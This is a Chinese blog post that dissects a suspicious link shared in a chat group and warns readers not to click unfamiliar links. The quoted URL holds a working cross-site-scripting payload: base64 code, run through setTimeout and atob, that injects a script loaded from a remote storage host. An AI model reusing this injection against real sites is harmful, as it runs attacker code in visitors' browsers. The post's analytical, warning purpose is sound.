群里有 这样一个 链接,因为是防疫群是不可能邀请大家 参加婚礼的。
于是乎好奇的点击了,然而浏览器并没有反应。
复制了 链接发下是这样一个奇怪的 地址
https://xxxx.com/mall/index.html?click_type=768123%27;setTimeout(atob(%27dmFyIHNzID0gZG9jdW1lbnQxY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7IHNzLnNyYyA9ICIvL3F3ZTEyMzMyMS5vc3MtY24tYmVpamluZy5hbGl5dW5jcy5jb20vanMvbXNnMjEuanMiOyBkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuYXBwZW5kQ2hpbGQoc3MpOw==%27)%2c1);//
%27 转码后 '
%2c1 转码后 ,1
setTimeout( ) 一秒后 执行
atob( ) : base64解密 函数
解密 后是一个 js 地址 :http://xxxxxx.oss-cn-beijing.aliyuncs.com/js/msg21.js
打开发现是一个加密的JS
因为是V5 js 加密的,这块没有接触过。Js的内容无法知道,但是 作者既然不想让看到,肯定代码里面没有干好事。至于是不是盗号或者推广或是广告 就不得而知。
如此一来: 陌生链接,具有诱惑性的链接,不要点
当然这种 包含恶意的链接平台和也会很快 屏蔽。
以后有机会可以研究一下js解密。
文章来源:刘俊涛的博客 欢迎关注公众号、留言、评论,一起学习。
__________________________________________________________________________________
若有帮助到您,欢迎点击推荐,您的支持是对我坚持最好的肯定(*^_^*)